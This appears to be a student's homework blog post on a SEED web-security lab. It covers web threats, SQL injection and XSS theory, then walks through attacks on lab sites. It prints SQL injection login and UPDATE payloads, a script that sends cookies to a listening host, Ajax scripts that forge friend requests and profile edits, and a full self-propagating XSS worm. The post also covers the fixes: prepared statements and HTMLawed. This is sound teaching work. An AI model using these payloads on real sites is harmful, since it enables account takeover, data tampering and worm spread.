20199106 2019-2020-2 《网络攻防实践》第十一周作业

20199106 2019-2020-2 《网络攻防实践》第十一周作业

作业说明

这个作业属于哪个课程 网络攻防实践
这个作业的要求在哪里 第十一次作业: Web应用程序安全攻防
我在该课程的目标 对网络攻防技术有一个比较全面的认识,能够掌握基本的攻防操作。
这个作业在哪个具体方面帮助我实现目标 学习了Web应用程序安全攻防 。

作业正文

实践内容

web应用程序体系结构及其安全威胁

  • web应用程序:是一种使用浏览器在互联网或企业内部网上进行访问操作的应用软件形态。常以浏览器支持的语言(JavaScript等脚本语言、HTML等渲染标记语言)所编写,或在浏览器控制的环境中运行(如Java Applet),依赖于浏览器来对应用程序进行渲染与执行。
  • web应用的体系结构:
    • 架构:经典三层架构,即表示层、业务逻辑层、数据层。
    • 关键组件:
      • 浏览器(Browser):标准的web客户端就是我们熟知的浏览器,都是使用HTTP/HTTPS协议、HTML语言和Web服务进行交互,获取web服务器上的信息和应用服务。
      • Web服务器(Web Server):Web服务器软件通常被简单地描述为HTTP守护程序,接受Web客户端对资源的请求,在这些请求上执行一些基本的解析处理以确定资源的存在,然后将它传送给web应用程序来执行,待web应用程序执行完逻辑并返回响应时,web服务器再将这个响应返回给web客户端,在浏览器上进行本地执行、渲染和展示。
      • Web 应用程序(Web Application):现代Web应用的核心是处于服务器的业务逻辑,也就是web应用程序。随着web应用技术的发展,web应用程序的功能越来越复杂和多样化,并出现分层的概念:最普遍应用的是三层(3-tiers)体系结构,由表示层、业务逻辑层和数据层组成。
      • 数据库(Database):有时候被称为“后台”,是web应用存储数据的地方,数据层也作为web应用程序多级结构中的最后一层。常用数据库管理软件有MS SQL Server、Oracle和开源的MySQL等。
      • 传输协议HTTP/HTTPS:是浏览器和由web服务器、web应用程序和数据库所构成的web站点之间的通信传输协议。HTTP(超文本传输协议)默认使用TCP 80端口,是相对比较简单、无状态、基于ASCII码的协议,其定义在IETF的标准化文档RFC 2616(HTTP 1.1)和RFC 1945(HTTP 1.0)中,HTTP协议使用统一资源标识符(URL)。运行于众所周知的默认TCP端口等特点,造就了HTTP协议的简单和流行,但也使它容易受到攻击。
    • web应用安全威胁:整个体系结构中的每个组件都存在着安全弱点,容易遭受到各种攻击。
      • 针对浏览器和终端用户的web浏览安全威胁:包括以浏览器渗透攻击为核心的网页木马、phishing网站钓鱼攻击等。
      • 针对传输网络的网络协议安全威胁:包括针对HTTP明文传输协议的敏感信息监听、假冒身份攻击、拒绝服务攻击等。
      • 系统层安全威胁:web站点的宿主操作系统存在着远程渗透攻击和本地渗透攻击威胁。
      • web服务器软件安全威胁:攻击者利用IIS、Apache这些典型的网络服务存在的安全漏洞对web服务器实施渗透攻击或获得敏感信息。
      • web应用程序安全威胁:SQL注入攻击,XSS跨站脚本攻击。
      • Web数据安全威胁:web站点中在web应用程序后台存储的关键数据内容以及web客户输入的数据内容存在着被窃取、篡改以及输入不良信息等威胁。

web应用安全攻防技术概述

  • web应用的信息收集

    • 定义:对目标web应用服务进行发现和剖析,标识出他的基本轮廓,具体包括服务器域名、IP地址和虚拟IP地址、Web服务器端口与其他开放服务、web站点类型和版本、web应用程序类型与版本以及web服务器和web应用程序中存在的安全漏洞信息等。
    • 针对web应用程序的探测和漏洞发现
      • 手工审查web应用程序结构与源代码:
        • 静态和动态生成的页面:HTML源文件可能包含一些有价值的隐藏和注释信息,如表单中的隐藏字段可能存在会话处理、用户标识、口令等敏感信息等。
        • 目录结构:Web服务器上的存储目录结构也是攻击者关注的信息,攻击者不会局限于利用浏览器及站点的导航链接来进行访问,他们会对Web服务器上可能存在的管理员目录、旧版本目录、备份目录、数据目录等进行探查,来查看这些目录是否存在,以及是否由于不安全的配置可以进行目录文件枚举,从而可以从中搜索包含关键信息或可被攻击的文件。
        • 辅助性文件:Web应用程序的一系列辅助性文件,如CSS级联样式表、XML样式表、JavaScript文件、include文件等,通常用于格式化HTML页面以适应流行浏览器的不同要求,或者执行客户端的输入验证。
        • 输入表单:表单是Web应用程序接受用户输入的主要途径,通过手工审查页面源代码可以发现一些关键表单的位置,并可以深入地了解页面表单的各方面信息,包括数据提交的方法(使用GET还是POST来提交数据)、表单处理行为(调用什么脚本?使用何种脚本语言?)、输入字段名称、最大长度限制、隐藏字段、自动完成标记、口令字段等。
        • 查询参数字符串:从Web应用程序中很容易收集到一些动态页面文件的查询参数字符串,这些查询参数字符串可以被复用以假冒其他用户、获取受限的数据、运行任意的系统命令,或者执行其他应用程序开发者所不希望看到的动作。
      • 自动下载与镜像web站点页面:逐个手工地审查分析Web站点页面源码往往是很烦琐且低效的,一些自动下载与镜像Web站点页面的工具能够提升这一工作的自动化程度。在Linux系统上,可以使用lynx、Wget等工具,在Windows上,可以使用迅雷、Flashget等工具。
      • 使用Google Hacking技术审查与探测web应用程序:Google Hacking技术特指Google搜索引擎或其他的Google应用,在web站点中的配置、计算机代码以及包含数据中,寻找安全漏洞与敏感信息的计算机黑客技术。是一种最高效的审查与探测方法。
      • web应用程序安全评估与漏洞探测:Web应用安全辅助分析工具包括如下三种重要类型:
        • 浏览器插件:一些面向Web应用程序分析、调试和安全检查的浏览器插件能够支持你在浏览网站时,实时查看和修改传递给远端web服务器的数据。
        • 免费工具集:安全社区也提供了一些开源或免费的Web应用安全评估工具集,它们较浏览器插件往往具有更强大的功能。
        • 商业Web应用安全评估系统和漏洞扫描器。
  • 攻击web服务器软件

    • web服务器平台中的安全漏洞主要有以下几大类:
      • 数据驱动的远程代码执行安全漏洞:作为一种典型的网络服务守护进程,Web服务器软件包也面临着缓冲区溢出、不安全指针、格式化字符串等一系列数据驱动安全漏洞的远程渗透攻击,这类攻击往往能够让攻击者在Web服务器上直接获得远程代码执行的权利,并以相当高的权限执行任意命令。
      • 服务器功能扩展模块漏洞:Web服务器软件通过一些功能扩展模块来为核心的HTTP引擎增加其他功能,启动包括动态代码执行、站点检索、web分布式写作与版本管理协议WebDAV、SSL加密协议等。
      • 样本文件安全漏洞:由于这些文件只是用来作为演示,往往编写的很仓促,但在默认的Web服务器软件安装实例中却一直保留着;一旦这些样本文件存在安全漏洞,就使得攻击者可以利用这些默认包含的样本文件来对Web服务器实施攻击。
      • 源代码泄露:源代码泄露漏洞让渗透测试人员能够查看到没有防护措施Web服务器上的应用程序源代码,在特定情况下,攻击者甚至可以利用这些漏洞查看到系统级的文件。
      • 资源解析攻击:Web服务器软件在处理资源请求时,需要将同一资源的不同表示方式解析为标准化名称,这一过程被称为资源解析。一些Web服务器软件可能在资源解析过程中遗漏一些输入合法性与合理性验证的处理,从而就可能导致目录遍历、敏感信息泄露、甚至代码注入攻击。
  • 攻击web应用程序

    • 目前安全最薄弱的环节:web应用程序,同时web应用程序的复杂性和灵活性又进一步恶化了他们的安全性。
    • 《WASC Web安全威胁分类v1.0》将Web应用程序安全威胁从攻击技术角度分为如下6类:
      • 针对认证机制的攻击:针对用来确认用户、服务或应用身份机制的攻击手段,包括暴力枚举、利用认证机制不完善弱点、攻击口令恢复验证机制等。
      • 授权机制的攻击:针对用来确定用户、服务或应用是否具有执行请求动作必须权限机制的攻击手段,包括信任/会话预测、利用授权机制不完善弱点、利用会话失效机制不完善弱点、会话身份窃取攻击等。
      • 客户端攻击:扰乱或者渗透攻击Web站点客户端用户的攻击手段,包括内容欺骗、跨站脚本攻击等。
      • 命令执行攻击:在Web站点上执行远程命令的攻击手段,包括缓冲区溢出、格式化字符串、LDAP注入、操作系统命令注入、SQL注入、SSI注入等。
      • 信息暴露:获取Web站点具体系统信息的攻击手段,包括目录列举、信息泄露、路径遍历、资源位置可预测等。
      • 逻辑攻击:扰乱或者渗透攻击Web应用逻辑流程的攻击手段,包括功能滥用、拒绝服务攻击、对抗自动程序不完善、处理验证过程不完善等。
  • 攻击web数据内容

    • web站点除通过服务器软件和应用程序中存在安全漏洞和弱点遭受攻击之外,还面临着:
      • 安全敏感数据泄露:
        • web服务器存在目录遍历漏洞或不安全的目录问价枚举配置在不经意间泄露;
        • 利用web服务器的upload、incoming等上传目录临时中转文件时泄露;
        • 缺乏安全意识,在web站点公开的文档资料包含隐私和秘密信息。
      • 网站内容遭受篡改:一般是网络骇客所为,在利用特定攻击手段入侵网站后,将网站页面内容进行替换,从而宣示入侵成功或表达攻击者的某种观点诉求。大多数网站篡改不具备破坏性,但攻击的行为侵害了网站的安全。
      • 不良信息内容上传:web站点在被攻击者入侵和控制之后可能遭受不良信息内容上传的威胁。
  • web应用安全防范措施

    • web站点网络传输安全设防措施

      • 尽量使用HTTPS来保障Web站点传输时的保密性、完整性与身份真实性,至少要对登录过程进行加密保护。
      • 通过加密的连接通道来管理Web站点,避免使用未加密的telnet、FTP、HTTP来进行web后台管理,而使用SSH、SFTP等安全协议。
      • 对关键的Web服务器,设置静态绑定MAC—IP映射,在服务网段内进行ARP等各类欺骗攻击的检测与MAC封禁机制,在网关位置部署防火墙与入侵检测系统对Web服务器实施保护与安全监测,采用荣誉等机制来应对拒绝服务攻击。
    • web站点操作系统以及服务安全设防措施

      • 对Web站点的操作系统与服务器软件进行及时的补丁更新;
      • 对Web站点服务器的操作系统及各种开放服务进行远程安全漏洞扫描,在攻击者利用安全漏洞实施攻击之前发现和修补这些安全漏洞;
      • 采用提升系统与服务安全性的一般性设防措施,包括关闭所有不使用的服务,避免使用明文传输的网络服务;设置强口令字,以及安全的服务配置;部署防火墙,设置对控制及内容上传通道的限制访问;配置数据备份服务,必要时设置冗余和双机热备机制。
    • web应用程序安全设防措施

      • 谨慎考虑是否采用动态页面技术、是否支持客户端执行代码、是否允许接受用户输入等
      • 对于必须提供用户交互、采用动态页面的Web站点,尽量使用具有良好安全声誉及稳定技术支持力量的Web应用软件包;
      • 只在必要时候自主或外包开发Web应用程序,重视安全编程、持续性的安全测试和维护;
      • 使用Web服务器软件提供的日志功能,对Web应用程序的所有访问请求进行日志记录与安全审计。
    • web站点数据安全设防措施

      • 提高网站内容维护人员的数据安全意识,确保组织与国家秘密信息不被泄露到对外公开提供服务的Web站点;
      • 对维护网站的数据安全实施日常检测与防护:提升Web站点的安全性,避免网站被攻击以后的信息泄露、网站内容篡改与不良信息上传。

SQL注入

代码注入是针对web应用程序的主流攻击技术之一,用过利用web应用程序的输入验证不完善漏洞,使得web应用程序执行由攻击者所注入的恶意指令和代码,造成敏感信息泄露、权限提升或对系统的未授权访问等危害后果。多类型的代码注入攻击中,SQL注入是目前最为常见、直观的一种攻击技术。

  • SQL注入攻击原理:利用web应用程序数据层存在的输入验证不完善型安全漏洞实施的一类代码注入攻击技术。被攻击的漏洞被称为SQL注入漏洞,是由于用户输入没有被正确地过滤以消除SQL语言中的字符串转义字符,或者没有进行严格的类型判断,从而用户可以输入并执行一些非预期的SQL指令代码。是向web应用程序提供的用户输入接口输入一段惊心构造的SQL查询命令,攻击和利用不完善的输入验证机制,使得注入代码得以执行完成非预期的攻击操作行为。
  • SQL注入攻击步骤和过程:
    • 发现SQL注入点:通过构造SQL语句判断Web应用程序对输入是否严格检查或过滤,以确定是否存在注入点。
    • 判断后台数据库类型
      • 利用数据库服务器的系统变量进行判断
      • 利用数据库服务器的系统表进行判断
        • ACCESS系统表为msysobjects,在Web环境下无访问权限
        • MS SQL Server系统表为sysobjects,在Web环境下有访问权限
    • 后台数据库管理员用户口令字猜解
      • 猜解表名
      • 猜解字段名
      • 用户名与口令猜解
    • 上传ASP后门,得到默认账户权限
      • ASP后门被上传至Web虚拟目录的Scripts下,攻击者通过浏览器访问它,进而获取Web服务器软件的默认账户权限
    • 本地权限提升:利用系统或某些特权应用服务安全漏洞;利用系统配置不当提升系统权限。
    • 利用数据库扩展存储过程执行Shell命令
  • SQL注入攻击工具:
    • 国外安全界较为知名的自动化SQL注入漏洞发现和攻击工具:
      • Wposion:能够在动态web文档中找出SQL注入漏洞;
      • wieliekoek.pl:能够以网站镜像工具生成的输出为输入,找出含有表单页面,允许在配置文件中对注入字符串进行修改,进行SQL注入漏洞探测;
      • SPIKE Proxy;允许使用者对待注入的字符串进行定制并执行自动化的SQL注入测试;
      • SPI Toolkit工具包中包含一个叫“SQL Injector”的自动化SQL注入测试工具。
    • 国内安全界也有很多优秀的SQL注入渗透测试工具软件:CSC、NBSI、HDSI、阿D注入工具、WED、Domain、Pangolin等。
  • SQL注入攻击防范措施:
    • 使用类型安全(type-safe)的参数编码机制;
    • 凡是来自外部的用户输入,必须进行完备检查;
    • 将动态SQL语句替换为存储过程、预编译SQL或ADO命令对象;
    • 加强SQL数据库服务器的配置与连接。

XSS跨站脚本攻击

XSS跨站脚本攻击的最终目标是使用web应用程序的用户。XSS跨站脚本漏洞存在于web应用程序中,使得攻击者可以在web页面中插入恶意的HTML或JavaScript代码,当用户浏览网页时候,客户端浏览器就会解析和执行这些插入的代码,从而造成获取用户敏感信息、客户端渗透攻击等危害后果。

  • XSS攻击技术原理:根源是web应用程序对用户输入内容的安全验证与过滤不够完善,但是他最终的攻击目标是访问web服务器的用户。用户提交的内容包含HTML、JavaScript及其他脚本代码,而一旦Web应用程序没有对这些输入的合法性进行有效检查与过滤,就很有可能让这些恶意代码逻辑包含在服务器动态产生或更新的网页中。
  • XSS攻击类型:
    • 持久性XSS漏洞:最严重的XSS漏洞,通常出现于一些可以将用户输入持久性保存在Web服务器端,并在一些“正常”页面中持续显示,从而能够影响所有访问这些页面的其他用户,该类XSS漏洞也被称作存储性XSS漏洞。
    • 非持久性XSS漏洞:当Web浏览器在HTTP请求参数或HTML提交表单中提供的数据,被立即由服务器端脚本使用产生一个提供给该用户的结果页面,而缺乏恰当的请求数据安全验证与过滤,那么就很可能存在着非持久性的XSS漏洞。针对这一非持久性XSS漏洞的具体攻击步骤:
      • 攻击者构造出一个包含恶意脚本的bank.com登录请求链接,并通过Email/HTTP等方式将该攻击链接发送给其他bank.com网站用户;
      • 受害者点击攻击链接后,将会把恶意链接中包含的恶意脚本当做用户名参数提交给bank.com的登录处理界面;
      • 由于bank.com登录处理页面存在XSS漏洞,将会在返回的欢迎页面中包含恶意客户端脚本;
      • 攻击者的恶意客户端脚本在受害者浏览器中执行,通常会驱动浏览器向攻击者发送会话令牌,如ID、Cookie等信息;
      • 攻击者获得用户会话令牌以后,就可以劫持用户会话,或者伪造用户登录bank.com,并可实施进一步攻击。
  • XSS攻击防范措施:
    • 服务器端防范措施:
      • 输入验证:Web应用程序应根据用户提交的数据进行严格的验证和过滤,需要验证的数据的潜在特性包括用户输入数据不是过长、仅包含某些合法字符、不能包含某些HTML与JavaScript关键标签符号、数据与一个特殊的正规表达式相匹配等。
      • 输出净化:Web应用程序对用户提交的数据进行HTML编码,以净化可能的恶意字符,将可能存在的恶意字符当做HTML文档内容而非结构来处理。
      • 消除危险的输入点:Web应用程序页面中有一些位置,在这里插入用户提交的输入就会造成极大的风险;因此,开发者应力求寻找其他方法执行必要的功能。
    • 客户端防范措施:跨站脚本最终是在客户端浏览器上执行的,因此对抗XSS攻击需要提升浏览器的安全设置,如提高浏览器访问非受信网站时的安全等级、关闭Cookie功能或设置Cookie只读,此外也可采用非主流的安全浏览器如Chrome、Opera来尽量降低安全风险。

实践过程

实践一:SQL 注入实验

任务:

(1)熟悉 SQL 语句: 我们已经创建了一个名为 Users 的数据库,其中包含一个名为 creditential 的表。该表存储了每个员工的个人信息(例如,eid,密码,薪水,ssn 等)。在此任务中,您需要使用数据库来熟悉 SQL 查询

(2)对 SELECT 语句的 SQL 注入攻击:上述 Web 应用存在 SQL 输入漏洞,任务是在不知道密码的情况下登陆该 Web 应用程序

(3)对 UPDATE 语句的 SQL 注入攻击:通过员工的更新个人界面实施 UPDATE 语句的 SQL 注入攻击

(4)SQL 对抗,修复上述 SQL 注入攻击漏洞

1、熟悉SQL语句

首先登录MySQL数据库,使用命令mysql -u root -pseedubuntu,使用系统创建好的Users数据库,use Users,查看该数据库下所有的表,show tables

可以看到该数据库存在一个名为“credential”的表,查看这个表的详细信息,select * from credential

2、对SELECT语句的SQL注入攻击

使用SEED访问已经搭建好的Web页面:www.SEEDLabSQLInjection.com,随机输入用户名和密码,可以看到进行校验的是unsafe_home.php

在终端使用命令vim /var/www/SQLInjection/unsafe_home.php查看对应的代码,发现该web应用的数据库用户为root,密码为seedubuntu:

进行登录认证时,区分admin用户及其他用户。用户信息表为credential:


登录时候的SQL查询语句:
SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= ’$input_uname’ and Password=’$hashed_pwd’

如果输入的username字段为Admin'#,Password字段为任意值。通过上述代码组合sql语句就可以得到如下的sql查询语句:

SELECT id, name, eid, salary, birth, ssn, address, email, nickname, Password FROM credential WHERE name= ’Admin'#’ and Password=’$hashed_pwd’

其中, # 在sql语句中代表注释,也就是并没有对密码进行判断。成功进入系统,看到了所有的用户信息。

3、对UPDATE语句的SQL注入攻击

首先找到UPDATE语句,这部分的内容在“unsafe_edit_backend.php”中。执行命令vim /var/www/SQLInjection/unsafe_edit_backend.php

该UPDATE语句可以看到员工只能修改基本的信息,无权修改工资,这条UPDATE语句也没有进行任何的保护如权限等,那我们的攻击就是修改salary。

使用相同的方法登录Alice。登陆成功后,可以看到salary为20000,编号是 10000,变量$input_nickname对应的就是用户输入的NickName

已知update时正确的处理语句为:

UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address', Password='$hashed_pwd', PhoneNumber='$input_phonenumber' WHERE ID=$id

在 NickName 输入语句 ', salary='0 where Name='Alice'; #,则可以把update语句改为 UPDATE credential SET nickname='',salary='0' where Name='Alice';。这个时候点击 save 可以看到已经修改成功,证明攻击成功。

4、SQL对抗,修复上述SQL注入攻击漏洞

SQL注入漏洞的根本问题是无法将代码与数据分离。当构造SQL语句时,程序(如PHP程序)知道哪一部分是数据,哪一部分是代码。但是当SQL语句被发送到数据库时,边界已经消失。要解决这个问题,重要的是要确保边界的视图是一致在服务器端代码和数据库中。最安全的方法是使用预处理语句。预处理语句的优势:一次编译、多次运行,省去了解析优化等过程;此外预处理语句能防止SQL注入。

例如:“unsafe_edit_backend.php”页面中,对UPDATE语句进行预处理。

原来的语句:

$sql = "UPDATE credential SET nickname='$input_nickname',email='$input_email',address='$input_address',PhoneNumber='$input_phonenumber' where ID=$id;";

修改后:

$sql = $conn->prepare("UPDATE credential SET nickname=?,email=?,address=?,PhoneNumber=? where ID=$id;");$sql->bind_param("ssss", $input_nickname, $input_email,$input_address, $input_phonenumber);

实践二:XSS 攻击实验

完成以下任务:

  • 发布恶意消息,显示警报窗口:在您的 Elgg 配置文件中嵌入一个 JavaScript 程序,以便当另一个用户查看您的配置文件时,将执行 JavaScript 程序并显示一个警报窗口。

  • 弹窗显示 cookie 信息:将 cookie 信息显示

  • 窃取受害者的 cookies:将 cookie 发送给攻击者

  • 成为受害者的朋友:使用 js 程序加受害者为朋友,无需受害者干预,使用相关的工具了解 Elgg 加好友的过程

  • 修改受害者的信息:使用 js 程序使得受害者在访问 Alice 的页面时,资料无需干预却被修改

  • 编写 XSS 蠕虫

  • 对抗 XSS 攻击

发布恶意消息,显示警报窗口

首先进入个人信息页面http://www.xsslabelgg.com/profile/alice,点击“Edit profile”,接着在下面的“Brief description”文本框输入语句<script>alert('xss');</script>,点击Save保存,页面弹出如下的提示框,点击“Save”保存。

窃取受害者cookie

在命令行输入nc -l 7777 -v监听7777端口,然后将“Brief description”项改为
document.write('<img src=http://192.168.200.20:7777?c='+escape(document.cookie) + ' >');
save后看到命令行7777端口收到了cookie信息

成为受害者的朋友

到Boby主页,点击Add Friend添加Boby为好友,在Web控制台Network窗口可以看到用POST方法发送的HTTP请求,有三个参数,分别是__elgg_token,__elgg_tsfriend

构造JS脚本:

`<script type="text/javascript">
window.onload = function () {
	var Ajax=null;
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;

	//Construct the HTTP request to add Samy as a friend.
	var sendurl="http://www.xsslabelgg.com/action/friends/add?friend=44" + ts + token; 

	//Create and send Ajax request to add friend
	Ajax=new XMLHttpRequest();
	Ajax.open("GET",sendurl,true);
	Ajax.setRequestHeader("Host","www.xsslabelgg.com");
	Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
	Ajax.send();
}
</script>`

将上述脚本填入Alice个人信息的About me中,推出Alice账户,登录Boby账户,访问Alice主页,然后返回自己的主页,发现已经添加了Alice为好友。

构造js脚本

<script type="text/javascript">
window.onload = function(){
	//JavaScript code to access user name, user guid, Time Stamp __elgg_ts
	//and Security Token __elgg_token
	var userName=elgg.session.user.name;
	var guid="&guid="+elgg.session.user.guid;
	var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
	var token="&__elgg_token="+elgg.security.token.__elgg_token;

	//Construct the content of your url.
	var content= token + ts + "name=" + userName + "&description=<p>this had been changed by xss attack.</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
	var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
	alert(content)
	//FILL IN
	var samyGuid=44;
	//FILL IN
	if(elgg.session.user.guid!=samyGuid)
	{
		//Create and send Ajax request to modify profile
		var Ajax=null;
		Ajax=new XMLHttpRequest();
		Ajax.open("POST",sendurl,true);
		Ajax.setRequestHeader("Host","www.xsslabelgg.com");
		Ajax.setRequestHeader("Content-Type","application/x-www-form-urlencoded");
		Ajax.send(content);
	}
}
</script>

将js脚本填入edit HTML模式下Alice的About me中保存。然后登陆Boby账户,访问Alice主页然后回到Boby主页,发现描述被攻击。

编写XSS蠕虫

两种方法:一种是链接的方法,另一种是调用 DOM API 的方法。这里使用第二种方法,为了实现蠕虫感染,可以将下面这段代码在不同的用户之间感染传播。构造代码:

<script id="worm" type="text/javascript">
window.onload = function(){
    var headerTag = "<script id=\'worm\' type=\'text/javascript\'>";
    var jsCode = document.getElementById("worm").innerHTML;
    var tailTag = "</" + "script>"; 
    var wormCode = encodeURIComponent(headerTag + jsCode + tailTag);

    var userName=elgg.session.user.name;
    var guid="&guid="+elgg.session.user.guid;
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;

    //Construct the content of your url.
    var content= token + ts + "&name=" + userName + "&description=<p>this page had been changed by xss attack  "+ wormCode + "</p> &accesslevel[description]=2&briefdescription=&accesslevel[briefdescription]=2&location=&accesslevel[location]=2&interests=&accesslevel[interests]=2&skills=&accesslevel[skills]=2&contactemail=&accesslevel[contactemail]=2&phone=&accesslevel[phone]=2&mobile=&accesslevel[mobile]=2&website=&accesslevel[website]=2&twitter=&accesslevel[twitter]=2" + guid;
    var sendurl = "http://www.xsslabelgg.com/action/profile/edit"
    alert(content)

    var samyGuid=44;

    if(elgg.session.user.guid!=samyGuid){
        var Ajax=null;
        Ajax=new XMLHttpRequest();
        Ajax.open("POST",sendurl,true);
        Ajax.setRequestHeader("Host","www.xsslabelgg.com");
        Ajax.setRequestHeader("Content-Type",
        "application/x-www-form-urlencoded");
        Ajax.send(content);
    }
}
</script>

将这段蠕虫代码放到Alice的About me中,然后登录Boby的用户访问Alice的主页,再登录Charlie的用户访问Boby的主页,可以看到Charlie也被感染了。

对抗XSS攻击

使用elgg提供的插件HTMLawed,管理员登陆后按如下操作:Account->Administration->plugins,将HTMLawed激活,再次访问Alice主页,发现About me蠕虫已失去效果,代码被展示

学习中遇到的问题及解决

问题一:seedubuntu不能复制粘贴。

解决:参照VM虚拟机在linux系统下如何实现文件复制粘贴操作解决。

学习感想和体会

这次实验挺有难度,加上虚拟机老是出状况,做起来很艰难。

参考资料

WEB安全之SQL注入

注入攻击-SQL注入和代码注入

VM虚拟机在linux系统下如何实现文件复制粘贴

posted @ 2020-05-14 08:16  happycarrot  阅读(163)  评论(0编辑  收藏  举报